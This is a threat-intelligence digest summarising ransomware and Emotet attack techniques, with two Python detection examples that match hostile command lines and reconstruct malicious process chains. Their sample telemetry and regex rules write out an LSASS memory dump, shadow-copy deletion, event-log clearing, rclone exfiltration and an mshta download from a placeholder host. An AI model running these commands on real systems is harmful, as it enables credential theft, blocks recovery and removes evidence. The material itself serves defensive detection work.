Ransomware Attack Techniques

May 03, 2022

Industry: N/A | Level: Tactical | Source: Symantec

Symantec’s analysis of the ransomware groups Hive, Conti, and Avoslocker has identified frequently used tools, tactics, and procedures (TTPs). During the initial access stage of the attack, the ransomware operators leverage exploits, RDP with weak or compromised credentials, and malware delivered through phishing emails involving IcedID, Emotet, QakBot, or TrickBot. Persistence involved the use of third-party remote software such as AnyDesk and ConnectWise Control along with modifications to the firewall and registry. Tools used for system discovery include ADRecon and Netscan. Credential access is achieved with a wide array of techniques involving Mimikatz, comsvcs.dll, extracting credentials from the registry, and using Task Manager to dump LSASS memory. Tools used for lateral movement include PsExec, WMI, BITSAdmin, and Mimikatz. Tampering with Windows event logs helped cover the attackers’ tracks. Data recovery is inhibited by deleting shadow copies. Lastly, for data exfiltration, the actors relied on RClone and FileZilla to transfer data.

  • Anvilogic Use Cases:
    • Registry key added with reg.exe
    • Windows Firewall Rule Creation
    • Mimikatz
    • Invoke-Expression Command
    • comsvcs.dll Lsass Memory Dump
    • Rundll32 Command Line
    • Task Manager lsass Dump
    • Credentials in Registry
    • Remote Admin Tools
    • WinRM Tools
    • BITSadmin Execution
    • Clear Windows Event Logs
    • Inhibit System Recovery Commands
    • Suspicious Registry Key Deleted
    • Rclone Execution
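The report above describes each stage by the command-line tools the operators used. The following is an added example (not Symantec's or Anvilogic's code) showing how several of the listed use cases can be expressed as command-line detections and then correlated per host, so that a machine touching more than one stage (credential access, recovery inhibition, log clearing, exfiltration) is escalated rather than each alert being reviewed in isolation. The telemetry is a constructed sample; hostnames, process ids and paths are made up, and the regexes are illustrative patterns, not Anvilogic's rule logic.

```python
import re
from dataclasses import dataclass

# Constructed process-creation telemetry (hypothetical sample, not data from the report).
SAMPLE_EVENTS = [
    {"host": "ws01", "cmdline": r"rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 712 C:\Users\Public\out.dmp full"},
    {"host": "ws01", "cmdline": "vssadmin.exe delete shadows /all /quiet"},
    {"host": "ws01", "cmdline": "wevtutil.exe cl Security"},
    {"host": "ws02", "cmdline": 'netsh advfirewall firewall add rule name="rdp" dir=in action=allow protocol=TCP localport=3389'},
    {"host": "ws02", "cmdline": r"rclone.exe copy C:\Finance remote:bucket --transfers 8"},
    {"host": "ws03", "cmdline": "vssadmin.exe list shadows"},                # routine admin check, should not fire
    {"host": "ws03", "cmdline": "rundll32.exe shell32.dll,Control_RunDLL"},  # benign rundll32 use, should not fire
]


@dataclass(frozen=True)
class Rule:
    name: str          # mirrors the use-case names listed above
    stage: str         # attack stage the report attributes the behaviour to
    pattern: re.Pattern


RULES = [
    Rule("comsvcs.dll Lsass Memory Dump", "credential access",
         re.compile(r"comsvcs\.dll.*minidump", re.I)),
    Rule("Inhibit System Recovery Commands", "impact",
         re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows"
                    r"|wmic(\.exe)?\s+shadowcopy\s+delete"
                    r"|wbadmin(\.exe)?\s+delete\s+catalog", re.I)),
    Rule("Clear Windows Event Logs", "defense evasion",
         re.compile(r"wevtutil(\.exe)?\s+(cl|clear-log)\b", re.I)),
    Rule("Windows Firewall Rule Creation", "persistence",
         re.compile(r"netsh(\.exe)?\s+advfirewall\s+firewall\s+add\s+rule", re.I)),
    Rule("Rclone Execution", "exfiltration",
         re.compile(r"\brclone(\.exe)?\b", re.I)),
]


def match_events(events):
    """Return (host, rule_name, stage) for every event whose command line matches a rule."""
    hits = []
    for ev in events:
        for rule in RULES:
            if rule.pattern.search(ev["cmdline"]):
                hits.append((ev["host"], rule.name, rule.stage))
    return hits


def stages_by_host(hits):
    """Group the distinct attack stages seen on each host."""
    out = {}
    for host, _, stage in hits:
        out.setdefault(host, set()).add(stage)
    return out


def escalate(hits, min_stages=2):
    """Hosts on which at least min_stages distinct stages fired; these get the analyst's attention first."""
    return sorted(h for h, s in stages_by_host(hits).items() if len(s) >= min_stages)


if __name__ == "__main__":
    hits = match_events(SAMPLE_EVENTS)
    for hit in hits:
        print(hit)
    print("escalate:", escalate(hits))
```

Single-rule hits (for example one `vssadmin list shadows`) stay quiet; the per-host stage count is what turns a noisy command-line rule into an incident signal.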

Red Canary’s Intelligence Insights

May 03, 2022

Industry: N/A | Level: Tactical | Source: RedCanary

Red Canary’s intelligence insights on threats observed during March 2022 have identified a shift in rankings: SocGholish, previously the top threat, slipped to #8 on the list, and Impacket claimed the top spot. The top five threats (highest to lowest) are Impacket, Mimikatz, Yellow Cockatoo, Cobalt Strike, and BloodHound. Additionally, Emotet has risen to the 6th spot (previously #8), and Qbot/Qakbot has dropped to 9th (previously #4). In April 2022 the Qbot malware was observed adjusting its delivery techniques to incorporate Windows Installer (MSI) packages, where it previously used malicious Office macros and compressed zip files. Microsoft’s decision to block VBA macros by default, since January 2022, has caused threat actors to adjust.

  • Anvilogic Use Cases:
    • Suspicious Email Attachment
    • Compressed File Execution
    • MSIExec Install MSI File

Catching Up With Emotet

April 26, 2022

Industry: N/A | Level: Tactical | Source: Fortinet

Fortinet reviewed activity from Emotet campaigns that deliver malicious documents using a variety of attack techniques. Since the malware’s reemergence in November 2021, it has been highly active; however, activity has tapered slightly, potentially because Microsoft disabled Excel 4.0 macros by default in January 2022. Analysis of five malicious document samples identified the use of an Excel or Word document containing either a malicious VBA macro or an Excel 4.0 macro to deliver Emotet. Execution of the macro typically uses wscript, PowerShell, or Mshta to download the Emotet payload. Once downloaded, the malware is executed with rundll32 or regsvr32.

  • Anvilogic Scenario: Emotet Behaviors
  • Anvilogic Use Cases:
    • Malicious Document Execution
    • Compressed File Execution
    • Wscript/Cscript Execution
    • Invoke-WebRequest Command
    • Suspicious File written to Disk
    • regsvr32 Execution
    • Rundll32 Command Line
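The Fortinet entry describes a process chain: an Office document, then a script host (wscript, PowerShell, or Mshta) that fetches the payload, then rundll32 or regsvr32 that runs it. The following is an added example (not Fortinet's or Anvilogic's code) that reconstructs that chain from process-creation events by walking parent-process links upward from each rundll32/regsvr32 launch, and scores the lineage by whether an Office application and a script host appear in it. The same logic also covers the variants described in the entries further down this page: the regsvr32 payload carrying a .ocx extension (Cybereason) and the Excel, Mshta, PowerShell sequence (Unit42). The events, pids, paths and URL are constructed; `loaded_module` is a simplified helper of my own and would be replaced by the image-load field of real telemetry.

```python
import ntpath

OFFICE_APPS = {"excel.exe", "winword.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "powershell.exe", "mshta.exe"}
LOADERS = {"rundll32.exe", "regsvr32.exe"}

# Constructed process-creation events (hypothetical; pids, paths and the URL are made up).
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1,   "image": "explorer.exe",   "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": "EXCEL.EXE",      "cmdline": r'EXCEL.EXE "C:\Users\a\Downloads\invoice.xlsm"'},
    {"pid": 300, "ppid": 200, "image": "mshta.exe",      "cmdline": "mshta.exe http://example.invalid/stage1.hta"},
    {"pid": 400, "ppid": 300, "image": "powershell.exe", "cmdline": "powershell.exe -w hidden -enc QUFBQQ=="},
    {"pid": 500, "ppid": 400, "image": "regsvr32.exe",   "cmdline": r"regsvr32.exe /s C:\Users\a\AppData\Local\Temp\pay.ocx"},
    # Benign control: an installer registering a vendor DLL, with no Office ancestor.
    {"pid": 600, "ppid": 1,   "image": "msiexec.exe",    "cmdline": "msiexec.exe /i app.msi"},
    {"pid": 700, "ppid": 600, "image": "regsvr32.exe",   "cmdline": r"regsvr32.exe /s C:\Vendor\lib.dll"},
]


def ancestors(index, pid, limit=16):
    """Walk ppid links upward and return parent, grandparent, ... (nearest first)."""
    chain = []
    cur = index.get(pid)
    while cur is not None and len(chain) < limit:
        cur = index.get(cur["ppid"])
        if cur is not None:
            chain.append(cur)
    return chain


def loaded_module(cmdline):
    """Best-effort: the last whitespace token that has a file extension, minus a rundll32 ',Entry' suffix.
    Quoted paths containing spaces are not handled; a real pipeline should use the parsed image-load field."""
    for tok in reversed(cmdline.split()):
        path = tok.split(",")[0].strip('"')
        if "." in ntpath.basename(path):
            return path
    return None


def analyze(events):
    """Score every rundll32/regsvr32 launch by the Office-to-script-host lineage above it."""
    index = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        if e["image"].lower() not in LOADERS:
            continue
        lineage = [a["image"].lower() for a in ancestors(index, e["pid"])]
        script_hosts = [i for i in lineage if i in SCRIPT_HOSTS]
        office = [i for i in lineage if i in OFFICE_APPS]
        module = loaded_module(e["cmdline"])
        ext = ntpath.splitext(module)[1].lower() if module else ""
        # Both loaders normally take a .dll; a renamed extension (e.g. .ocx) is a weak extra signal.
        non_dll_ext = bool(module) and ext != ".dll"
        score = 2 * bool(office) + bool(script_hosts) + non_dll_ext
        if score >= 2:
            findings.append({"pid": e["pid"], "loader": e["image"], "module": module,
                             "office": office, "script_hosts": script_hosts,
                             "non_dll_extension": non_dll_ext, "score": score})
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f)
```

Weighting the Office ancestor highest keeps ordinary installer use of regsvr32 (the `msiexec` branch in the sample) below threshold, while a document-spawned chain scores even when the script host stage is missing, which matters for the PowerShell-free Emotet variant Cybereason describes below.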

IRS Themed Phishing with Emotet

March 22, 2022

Industry: N/A | Level: Tactical | Source: Cofense

In the spirit of the U.S. 2022 tax season, Emotet has tailored its latest phishing campaign to the financial event. Cofense Intelligence has repeatedly identified Emotet using this particular theme in past years, masquerading as the Internal Revenue Service (IRS) to lure victims into opening an attached zip file containing a malicious document. If executed, the document drops the Emotet .dll file onto the victim’s workstation.

  • Anvilogic Use Cases:
    • Compressed File Execution
    • Malicious Document Execution
    • Suspicious File written to Disk

Emotet Surges in Japan

March 15, 2022

Industry: N/A | Level: Tactical | Source: Cybereason

Cybereason’s tracking of Emotet malware in the first quarter of 2022 has identified a surge of Emotet activity against Japanese organizations. Emotet’s distribution has been identified through malicious Excel documents that download the malware upon execution. The malware uses regsvr32 to execute a malicious DLL file, although the file carries a .ocx extension. Subsequent activity involves the malware establishing persistence in the registry and conducting reconnaissance. Cybereason noted that Emotet has not used PowerShell for deployment in its current attacks.

  • Anvilogic Scenarios:
    • Emotet Behaviors
    • Malicious Document Delivering Malware
  • Anvilogic Use Cases:
    • Malicious Document Execution
    • regsvr32 Execution
    • New AutoRun Registry Key
    • Common Reconnaissance Commands

Trickbot Mystery

March 01, 2022

Industry: N/A | Level: Strategic | Source: Intel471

Corresponding with AdvIntel’s reports of fading Trickbot activity, Intel471 also reports noticeably dormant activity from the notorious malware, as no new Trickbot campaigns have been observed in 2022. Tracking of Trickbot campaigns identified only three during December 2021, with the latest campaign occurring on December 28th, 2021. December’s activity is lower than the eight campaigns identified in November 2021. In addition, Intel471 observes a lack of updates to “onboard malware configuration files (mcconf), which contain a list of controller addresses the bot can connect to.” The drop in Trickbot activity is theorized to be due to a shift in operations in favor of Emotet. The lack of Trickbot activity is not a sign that the malware operation is dead, as its command and control infrastructure remains active. Malware associated with Trickbot, such as Emotet, Bazar and Bokbot, should be closely monitored, especially as they are closely tied to ransomware deployments such as Conti.

Emotet Changes Infection Tactic

February 22, 2022

Industry: N/A | Level: Tactical | Source: Unit42

Palo Alto Unit42’s tracking of the prolific Emotet malware has identified a new infection method used by the malware. Starting with phishing emails containing a hijacked email thread, “The new attack delivers an Excel file through email, and the document contains an obfuscated Excel 4.0 macro. When the macro is activated, it downloads and executes an HTML application that downloads two stages of PowerShell to retrieve and execute the final Emotet payload.” Since the malware’s resurgence in November 2021, it has used a variety of techniques for its distribution, mostly involving email attachments as well as masquerading as an Adobe Windows App Installer package.

  • Anvilogic Scenario: Malicious Document Delivering Malware
  • Anvilogic Use Cases:
    • Compressed File Execution
    • MSHTA.exe execution

Cybereason Threat Analysis Report

February 15, 2022

Cybereason’s Global Security Operations Center Team (GSOC) provides a threat analysis report detailing comprehensive attack scenarios from malware loaders IcedID, QBot, and Emotet that lead to compromises with Cobalt Strike.

Emotet and App Installer

December 01, 2021

Industry: N/A | Level: Tactical | Sources: Twitter – @malware_traffic & BleepingComputer

Sophos reported on November 11th 2021 that Emotet malware is following the same tactics used by Bazarloader to abuse Windows App Installer packages, as noted by Twitter security researcher @malware_traffic. The attack chain starts with an email from a stolen reply chain containing a URL link to an alleged PDF document. The link leads to a Google Drive-styled page, where a download occurs for a file hosted on Microsoft Azure URLs at .web.core.windows.net. Following the install of an alleged Adobe PDF component, a DLL file is downloaded to the %Temp% folder and executed with rundll32; additionally, an autorun entry gets created.

  • Anvilogic Scenario: Malware & AppInstaller
  • Anvilogic Use Cases:
    • AppInstaller.exe Download
    • New AutoRun Registry Key

Why the Emotet Resurgence by AdvIntel

November 21, 2021

Industry: N/A | Level: Strategic | Source: AdvIntel

Researchers at AdvIntel observed a resurgence of Emotet on November 14th, 2021, and postulate that it is the result of “unfulfilled loader commodity demand, decline of the decentralized RaaS (Ransomware-as-a-Service) model, and the return of the monopoly of organized crime syndicates such as Conti.” Based on AdvIntel’s intelligence tracking, the resurgence appears to have been initiated by a former Ryuk member who convinced a former Emotet operator to rebuild and set up the malware builder. Given Emotet’s effectiveness at providing initial access, the prediction is a potential rise or dominance of Conti ransomware. All appear to be motivated by the previous successes of the alliance between Emotet, TrickBot, and Ryuk in 2018.